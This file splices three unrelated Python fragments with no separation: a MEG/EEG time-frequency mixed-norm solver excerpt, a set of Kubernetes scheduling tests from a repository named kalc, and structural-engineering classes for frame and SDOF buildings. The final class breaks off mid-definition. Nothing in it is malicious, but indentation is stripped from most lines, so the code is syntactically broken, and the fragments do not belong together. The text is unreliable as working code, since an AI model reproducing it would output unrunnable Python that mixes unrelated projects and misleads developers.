n_steps = np.ceil(M.shape[1] / tstep.astype(float)).astype(int)
n_freqs = wsize // 2 + 1
n_coefs = n_steps * n_freqs
phi = _Phi(wsize, tstep, n_coefs)
alpha_max = norm_epsilon_inf(gain, M, phi, l1_ratio, n_dip_per_pos)
alpha_max *= 0.01
gain /= alpha_max
source_weighting /= alpha_max
X, active_set, E = tf_mixed_norm_solver(
M, gain, alpha_space, alpha_time, wsize=wsize, tstep=tstep,
maxit=maxit, tol=tol, verbose=verbose, n_orient=n_dip_per_pos,
dgap_freq=dgap_freq, debias=debias)
if active_set.sum() == 0:
raise Exception("No active dipoles found. "
"alpha_space/alpha_time are too big.")
# Compute estimated whitened sensor data
    M_estimated = np.dot(gain[:, active_set], X)
# Repository: KellyGriffin/kalc
from tests.test_util import print_objects
from tests.libs_for_tests import prepare_yamllist_for_diff
from kalc.model.search import Check_services, Check_deployments, Check_daemonsets, OptimisticRun, CheckNodeOutage, Check_node_outage_and_service_restart
from kalc.model.system.Scheduler import Scheduler
from kalc.model.system.globals import GlobalVar
from kalc.model.kinds.Service import Service
from kalc.model.kinds.Node import Node
from kalc.model.kinds.Pod import Pod
from kalc.model.kinds.Deployment import Deployment
from kalc.model.kinds.DaemonSet import DaemonSet
from kalc.model.kinds.PriorityClass import PriorityClass
from kalc.model.kubernetes import KubernetesCluster
from kalc.misc.const import *
import pytest
import inspect
from kalc.model.search import K8ServiceInterruptSearch
from kalc.misc.object_factory import labelFactory
from click.testing import CliRunner
from kalc.model.scenario import Scenario
from poodle import planned
from tests.libs_for_tests import convert_space_to_yaml,print_objects_from_yaml,print_plan,load_yaml, print_objects_compare, checks_assert_conditions, reload_cluster_from_yaml, checks_assert_conditions_in_one_mode
DEBUG_MODE = 2  # 0 - no debug, 1 - debug with yaml load, 2 - debug without yaml load
def build_running_pod(podName, cpuRequest, memRequest, atNode):
pod_running_1 = Pod()
pod_running_1.metadata_name = "pod"+str(podName)
pod_running_1.cpuRequest = cpuRequest
pod_running_1.memRequest = memRequest
pod_running_1.atNode = atNode
pod_running_1.status = STATUS_POD["Running"]
pod_running_1.hasDeployment = False
pod_running_1.hasService = False
pod_running_1.hasDaemonset = False
return pod_running_1
def build_running_pod_with_d(podName, cpuRequest, memRequest, atNode, d, ds):
pod_running_1 = Pod()
pod_running_1.metadata_name = "pod"+str(podName)
pod_running_1.cpuRequest = cpuRequest
pod_running_1.memRequest = memRequest
pod_running_1.atNode = atNode
pod_running_1.status = STATUS_POD["Running"]
pod_running_1.hasDeployment = False
pod_running_1.hasService = False
pod_running_1.hasDaemonset = False
if d is not None:
d.podList.add(pod_running_1)
d.amountOfActivePods += 1
pod_running_1.hasDeployment = True
if ds is not None:
ds.podList.add(pod_running_1)
ds.amountOfActivePods += 1
pod_running_1.hasDaemonset = True
atNode.currentFormalCpuConsumption += cpuRequest
atNode.currentFormalMemConsumption += memRequest
return pod_running_1
def build_pending_pod(podName, cpuRequest, memRequest, toNode):
p = build_running_pod(podName, cpuRequest, memRequest, Node.NODE_NULL)
p.status = STATUS_POD["Pending"]
p.toNode = toNode
p.hasDeployment = False
p.hasService = False
p.hasDaemonset = False
return p
def build_pending_pod_with_d(podName, cpuRequest, memRequest, toNode, d, ds):
p = Pod()
p.metadata_name = "pod"+str(podName)
p.cpuRequest = cpuRequest
p.memRequest = memRequest
p.status = STATUS_POD["Pending"]
p.hasDeployment = False
p.hasService = False
p.hasDaemonset = False
if d is not None:
d.podList.add(p)
p.hasDeployment = True
if ds is not None:
ds.podList.add(p)
p.hasDaemonset = True
p.toNode = toNode
return p
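# Usage sketch: a pending 2-CPU / 2-mem pod named "pod1" headed for `node`,
# registered in deployment `d` and in no daemonset (names are illustrative):
#   p = build_pending_pod_with_d(1, 2, 2, node, d, None)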
def prepare_test_29_many_pods_not_enough_capacity_for_service(nodes_amount,node_capacity,pod2_amount,pod0_amount,pod2_2_amount,pod3_amount):
# Initialize scheduler, globalvar
k = KubernetesCluster()
scheduler = next(filter(lambda x: isinstance(x, Scheduler), k.state_objects))
# initial node state
i = 0
j = 0
nodes = []
pods = []
    # Service to detect eviction
s = Service()
s.metadata_name = "test-service"
s.amountOfActivePods = 0
s2 = Service()
s2.metadata_name = "test-service2"
s2.amountOfActivePods = 0
    # create Deployment that we're going to detect failure of...
d = Deployment()
d.spec_replicas = 2
pod_id = 1
for i in range(nodes_amount):
node_item = Node("node"+str(i))
node_item.cpuCapacity = node_capacity
node_item.memCapacity = node_capacity
node_item.isNull = False
node_item.status = STATUS_NODE["Active"]
nodes.append(node_item)
for j in range(pod2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod0_amount):
pod_running_0 = build_running_pod_with_d(pod_id,0,0,node_item,None,None)
pod_id += 1
pods.append(pod_running_0)
node_item.amountOfActivePods += 1
for j in range(pod2_2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod3_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,nodes[0],None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s2.podList.add(pod_running_2)
s2.amountOfActivePods +=1
# priority for pod-to-evict
pc = PriorityClass()
pc.priority = 10
pc.metadata_name = "high-prio-test"
k.state_objects.extend(nodes)
k.state_objects.extend(pods)
k.state_objects.extend([pc, s, s2 ])
create_objects = []
k2 = reload_cluster_from_yaml(k,create_objects)
k._build_state()
class NewGoal_k1(CheckNodeOutage):
pass
p = NewGoal_k1(k.state_objects)
class NewGoal_k2(CheckNodeOutage):
pass
p2 = NewGoal_k2(k2.state_objects)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
return k, k2, p , p2
def prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(nodes_amount,node_capacity,pod2_amount,pod0_amount,pod2_2_amount,pod3_amount):
# Initialize scheduler, globalvar
k = KubernetesCluster()
scheduler = next(filter(lambda x: isinstance(x, Scheduler), k.state_objects))
# initial node state
i = 0
j = 0
nodes = []
pods = []
    # Service to detect eviction
s = Service()
s.metadata_name = "test-service"
s.amountOfActivePods = 0
s2 = Service()
s2.metadata_name = "test-service2"
s2.amountOfActivePods = 0
    # create Deployment that we're going to detect failure of...
d = Deployment()
d.spec_replicas = 2
pod_id = 1
for i in range(nodes_amount):
node_item = Node("node"+str(i))
node_item.cpuCapacity = node_capacity
node_item.memCapacity = node_capacity
node_item.isNull = False
node_item.status = STATUS_NODE["Active"]
nodes.append(node_item)
for j in range(pod2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod0_amount):
pod_running_0 = build_running_pod_with_d(pod_id,0,0,node_item,None,None)
pod_id += 1
pods.append(pod_running_0)
node_item.amountOfActivePods += 1
for j in range(pod2_2_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,node_item,None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s.podList.add(pod_running_2)
s.amountOfActivePods +=1
for j in range(pod3_amount):
pod_running_2 = build_running_pod_with_d(pod_id,2,2,nodes[0],None,None)
pod_id += 1
pod_running_2.hasService = True
pods.append(pod_running_2)
node_item.amountOfActivePods += 1
s2.podList.add(pod_running_2)
s2.amountOfActivePods +=1
# priority for pod-to-evict
pc = PriorityClass()
pc.priority = 10
pc.metadata_name = "high-prio-test"
k.state_objects.extend(nodes)
k.state_objects.extend(pods)
k.state_objects.extend([pc, s, s2 ])
create_objects = []
k._build_state()
class NewGoal_k1(CheckNodeOutage):
pass
p = NewGoal_k1(k.state_objects)
NewGoal_k1.__name__ = inspect.stack()[0].function
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
print_objects(k.state_objects)
return k, p
def test_29():
k, k2, p, p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,15,1,1,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_30():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,19,2,2,1,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_31():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,23,3,3,1,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_32():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,26,3,3,2,2)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_33():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,32,4,4,4,4)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_34():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,40,5,5,5,5)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_36():
k, k2, p, p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,8,1,1,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_37():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,8,2,2,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_38():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,8,3,3,1,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_39():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,4,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_40():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,25,5,5,5,5)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
    checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_41():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,11,4,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_42():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,5,5,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_43():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,5,5,5,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_44():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,5,5,5,5)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_45():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,12,4,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_46():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,16,5,4,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_47():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,20,5,5,4,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_48():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(2,24,5,5,5,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_49():
k, k2,p ,p2 = prepare_test_29_many_pods_not_enough_capacity_for_service(1,10,5,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_50_7pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,15,3,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_51_11pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,19,5,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_52_14pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,23,7,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_53_17pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,26,8,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_54_25pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,32,12,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_55_31pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,40,15,0,0,1)
assert_conditions = ["SchedulerQueueCleanHighCost",\
"Mark_node_outage_event"]
not_assert_conditions = []
checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_56_7pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,20,3,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_57_11pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,25,5,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_58_15pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,30,7,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_59_25pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,30,12,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_60_31pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,35,15,0,0,1)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test",DEBUG_MODE)
def test_61_28pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,40,12,0,0,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def test_62_32pods():
k, p = prepare_test_29_many_pods_not_enough_capacity_for_service_without_yaml_loading(2,40,14,0,0,4)
assert_conditions = ["MarkServiceOutageEvent",\
"Mark_node_outage_event"]
not_assert_conditions = []
    assert_brake = checks_assert_conditions_in_one_mode(k,p,assert_conditions,not_assert_conditions,"functional test", DEBUG_MODE)
def _assign_loaded_columns(self):
for ss in range(self.n_storeys):
for bb in range(self.n_bays):
sect_is = self._loaded_column_section_ids[ss][bb]
if hasattr(sect_is, "__len__"):
n_sections = len(sect_is)
self.columns[ss][bb].split_into_multiple([1] * n_sections) # TODO: should be lengths
for sect_i in range(len(sect_is)):
column_sect_id = str(self._loaded_column_section_ids[ss][bb][sect_i])
sect_dictionary = self._loaded_column_sections[column_sect_id]
sf.add_to_obj(self.columns[ss][bb].sections[sect_i], sect_dictionary)
else: # deprecated loading
deprecation("Frame data structure is out-of-date, "
"run sfsimodels.migrate_ecp(<file-path>, <out-file-path>).")
column_sect_id = str(self._loaded_column_section_ids[ss][bb])
sect_dictionary = self._loaded_column_sections[column_sect_id]
sf.add_to_obj(self.columns[ss][bb].sections[0], sect_dictionary)
def set_beam_prop(self, prop, values, repeat="up", sections=None):
"""
Specify the properties of the beam
Parameters
----------
prop: str
Name of property that values should be assigned to
values: value or array_like
Value or list of values to be assigned
repeat: str
            If 'up' then duplicate up the structure, if 'all' then duplicate for all beams
"""
si = 0
if sections is not None:
si = 1
values = np.array(values)
if repeat == "up":
assert len(values.shape) == 1 + si
values = [values for ss in range(self.n_storeys)]
elif repeat == "all":
assert len(values.shape) == 0 + si
values = [[values for i in range(self.n_bays)] for ss in range(self.n_storeys)]
else:
assert len(values.shape) == 2 + si
if len(values[0]) != self.n_bays:
raise ModelError("beam depths does not match number of bays (%i)." % self.n_bays)
for ss in range(self.n_storeys):
for i in range(self.n_bays):
self._beams[ss][i].set_section_prop(prop, values[ss][i], sections=sections)
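    # Usage sketch (`frame` is an illustrative instance): assign a single
    # 0.5 m depth to every beam of every storey:
    #   frame.set_beam_prop("depth", 0.5, repeat="all")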
def set_column_prop(self, prop, values, repeat="up", sections=None):
"""
Specify the properties of the columns
Parameters
----------
prop: str
Name of property that values should be assigned to
values: value or array_like
Value or list of values to be assigned
repeat: str
            If 'up' then duplicate up the structure, if 'all' then duplicate for all columns
"""
si = 0
if sections is not None:
si = 1
values = np.array(values)
if repeat == "up":
assert len(values.shape) == 1 + si
values = [values for ss in range(self.n_storeys)]
elif repeat == 'all':
assert len(values.shape) == 0 + si
values = [[values for i in range(self.n_cols)] for ss in range(self.n_storeys)]
else:
assert len(values.shape) == 2 + si
if len(values[0]) != self.n_cols:
raise ModelError("column props does not match n_cols (%i)." % self.n_cols)
for ss in range(self.n_storeys):
for i in range(self.n_cols):
self._columns[ss][i].set_section_prop(prop, values[ss][i], sections=sections)
def beams_at_storey(self, storey):
"""Get the beams at a particular storey"""
return self._beams[storey - 1]
def get_beams_at_storey(self, storey):
"""Get the beams at a particular storey"""
return self._beams[storey - 1]
@property
def beam_depths(self):
"""Get a 2D array of beam depths, first index is storey"""
beam_depths = []
for ss in range(self.n_storeys):
beam_depths.append([])
for i in range(self.n_bays):
beam_depths[ss].append(self.beams[ss][i].get_section_prop("depth"))
return np.array(beam_depths)
@property
def beam_widths(self):
"""Get a 2D array of beam widths, first index is storey"""
beam_widths = []
for ss in range(self.n_storeys):
beam_widths.append([])
for i in range(self.n_bays):
beam_widths[ss].append(self.beams[ss][i].get_section_prop("width"))
return np.array(beam_widths)
@property
def column_depths(self):
"""Get a 2D array of column depths, first index is storey"""
column_depths = []
for ss in range(self.n_storeys):
column_depths.append([])
for i in range(self.n_cols):
column_depths[ss].append(self.columns[ss][i].get_section_prop("depth"))
return np.array(column_depths)
@property
def column_widths(self):
"""Get a 2D array of column widths, first index is storey"""
column_widths = []
for ss in range(self.n_storeys):
column_widths.append([])
for i in range(self.n_cols):
column_widths[ss].append(self.columns[ss][i].get_section_prop("width"))
return np.array(column_widths)
@property
def bay_lengths(self):
return self._bay_lengths
@bay_lengths.setter
def bay_lengths(self, bay_lengths):
if len(bay_lengths) != self.n_bays:
raise ModelError("bay_lengths does not match number of bays (%i)." % self.n_bays)
self._bay_lengths = np.array(bay_lengths)
def get_column_positions(self): # could override in frame building if floor length is longer than bay lengths
return np.cumsum(np.pad(self.bay_lengths, (1, 0), "constant")) - np.sum(self.bay_lengths) / 2
class FrameBuilding(Frame, Building):
_n_seismic_frames = None
_n_gravity_frames = None
type = "frame_building"
def __init__(self, n_storeys, n_bays):
"""
A building that has frames aligned along the length axis
:param n_storeys:
:param n_bays:
"""
Frame.__init__(self, n_storeys, n_bays)
Building.__init__(self, n_storeys)
# super(BuildingFrame, self).__init__(n_storeys, n_bays) # run parent class initialiser function
self._extra_class_inputs = ["n_seismic_frames",
"n_gravity_frames",
"horz2vert_mass"]
self.inputs = self.inputs + self._extra_class_inputs
self.horz2vert_mass = 1.0
self.x_offset = 0.0 # distance between centre of frame and centre of floor
# Frame.__init__(self, n_storeys, n_bays)
# Building.__init__(self, n_storeys, n_bays)
@property
def ancestor_types(self):
"""List of ancestors class types"""
return super(FrameBuilding, self).ancestor_types + ["frame_building"]
@property
def n_seismic_frames(self):
"""Number of seismically resisting frames"""
return self._n_seismic_frames
@n_seismic_frames.setter
def n_seismic_frames(self, value):
self._n_seismic_frames = value
@property
def n_gravity_frames(self):
return self._n_gravity_frames
@n_gravity_frames.setter
def n_gravity_frames(self, value):
self._n_gravity_frames = value
@property
def n_frames(self):
return self.n_gravity_frames + self.n_seismic_frames
def get_column_vert_loads(self):
"""
Vertical loads at column bases
return [len-axis][width-axis]
:return:
"""
n_total = np.sum(self.storey_masses) * 9.8
edge = (self.floor_length - np.sum(self.bay_lengths)) / 2
trib_lens = np.zeros(self.n_cols)
trib_lens[0] = self.bay_lengths[0] / 2 + edge + self.x_offset
trib_lens[-1] = self.bay_lengths[-1] / 2 + edge - self.x_offset
trib_lens[1:-1] = (self.bay_lengths[1:] + self.bay_lengths[:-1]) / 2
tw = self.floor_width / (self.n_frames - 1)
        trib_widths = tw * np.ones(self.n_frames)  # one tributary width per frame
trib_widths[0] = tw / 2
trib_widths[-1] = tw / 2
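        # Each column base carries its tributary area (trib_len x trib_width)
        # as a fraction of the floor area, times the total vertical load.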
return n_total * (trib_lens[:, np.newaxis] * trib_widths[np.newaxis, :]) / self.floor_area
def add_to_dict(self, models_dict, return_mdict=False, **kwargs):
frame_mdict = Frame.add_to_dict(self, models_dict, return_mdict=True, **kwargs)
building_mdict = Building.add_to_dict(self, models_dict, return_mdict=True, **kwargs)
mdict = {**frame_mdict, **building_mdict}
if return_mdict:
return mdict
models_dict[self.base_type][self.unique_hash] = mdict
class FrameBuilding2D(Frame, Building):
_extra_class_inputs = []
type = "frame_building2D"
def __init__(self, n_storeys, n_bays):
"""
        A 2-dimensional definition of a frame building
Parameters
----------
n_storeys: int
Number of storeys
n_bays: int
Number of bays
"""
Frame.__init__(self, n_storeys, n_bays)
Building.__init__(self, n_storeys)
# super(FrameBuilding2D, self).__init__(n_storeys, n_bays) # run parent class initialiser function
self.inputs = self.inputs + self._extra_class_inputs
@property
def ancestor_types(self):
return ["physical_object", "frame", "building"] + ["frame_building2D"] # TODO: improve this logic
def to_dict(self, extra=(), compression=True, **kwargs):
outputs = OrderedDict()
skip_list = ["beams", "columns"]
full_inputs = self.inputs + list(extra)
for item in full_inputs:
if item not in skip_list:
value = self.__getattribute__(item)
outputs[item] = sf.collect_serial_value(value)
# Deal with sections
column_sections = OrderedDict()
column_section_ids = []
column_section_count = 0
for ss in range(self.n_storeys):
column_section_ids.append([])
for cc in range(self.n_cols):
column_section_ids[ss].append([])
for sect_i in range(len(self.columns[ss][cc].sections)):
if compression: # build a hash string of the section inputs to check uniqueness
parts = []
for item in self.columns[ss][cc].sections[sect_i].inputs:
if item == "id" or item == "name":
continue
parts.append(item)
parts.append(str(self.columns[ss][cc].get_section_prop(item, section_i=sect_i)))
p_str = "-".join(parts)
else:
p_str = str(sect_i)
if p_str not in column_sections:
column_sections[p_str] = self.columns[ss][cc].sections[sect_i].to_dict(extra)
column_section_count += 1
col_sect_id = column_section_count
column_sections[p_str]["id"] = col_sect_id
else:
col_sect_id = column_sections[p_str]["id"]
column_section_ids[ss][cc].append(col_sect_id)
beam_sections = OrderedDict()
beam_section_ids = []
beam_section_count = 0
for ss in range(self.n_storeys):
beam_section_ids.append([])
for bb in range(self.n_bays):
beam_section_ids[ss].append([])
for sect_i in range(len(self.beams[ss][bb].sections)):
if compression: # build a hash string of the section inputs to check uniqueness
parts = []
for item in self.beams[ss][bb].sections[sect_i].inputs:
if item == "id" or item == "name":
continue
parts.append(item)
parts.append(str(self.beams[ss][bb].get_section_prop(item, section_i=sect_i)))
p_str = "-".join(parts)
else:
p_str = str(sect_i)
if p_str not in beam_sections:
beam_sections[p_str] = self.beams[ss][bb].sections[sect_i].to_dict(extra)
beam_section_count += 1
beam_sect_id = beam_section_count
beam_sections[p_str]["id"] = beam_sect_id
else:
beam_sect_id = beam_sections[p_str]["id"]
beam_section_ids[ss][bb].append(beam_sect_id)
outputs["column_section_ids"] = column_section_ids
outputs["beam_section_ids"] = beam_section_ids
outputs["column_sections"] = OrderedDict()
outputs["beam_sections"] = OrderedDict()
for i, p_str in enumerate(column_sections):
outputs["column_sections"][column_sections[p_str]["id"]] = column_sections[p_str]
for i, p_str in enumerate(beam_sections):
outputs["beam_sections"][beam_sections[p_str]["id"]] = beam_sections[p_str]
return outputs
class WallBuilding(Building):
"""
A building with walls
"""
n_walls = 1
wall_depth = 0.0 # m
wall_width = 0.0 # m
type = "wall_building"
def __init__(self, n_storeys):
super(WallBuilding, self).__init__(n_storeys) # run parent class initialiser function
self._extra_class_inputs = [
"n_walls",
"wall_depth",
"wall_width"
]
self.inputs += self._extra_class_inputs
@property
def ancestor_types(self):
return super(WallBuilding, self).ancestor_types + ["wall_building"]
class SDOFBuilding(PhysicalObject):
"""
An object to describe structures.
"""
_id = None
name = None
base_type = "building"
type = "sdof"
_h_eff = None
_mass_eff = None
_t_fixed = None
_mass_ratio = None
_foundation = None
x_fd = None
z_fd = None
def __init__(self, g=9.8):
self.inputs = [
"id",
"name",
"base_type",
"type",
"h_eff",
"mass_eff",
"t_fixed",
"mass_ratio",
'foundation_id',
'x_fd',
'z_fd'
]
self._g = g
@property
def ancestor_types(self):
return super(SDOFBuilding, self).ancestor_types + ["sdof"]
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = int(value)
@property
def h_eff(self):
return self._h_eff
@h_eff.setter
def h_eff(self, value):
if value is None or value == "":
return
self._h_eff = float(value)
@property
def mass_eff(self):
return self._mass_eff
@mass_eff.setter
def mass_eff(self, value):
if value is None or value == "":
return
self._mass_eff = float(value)
@property
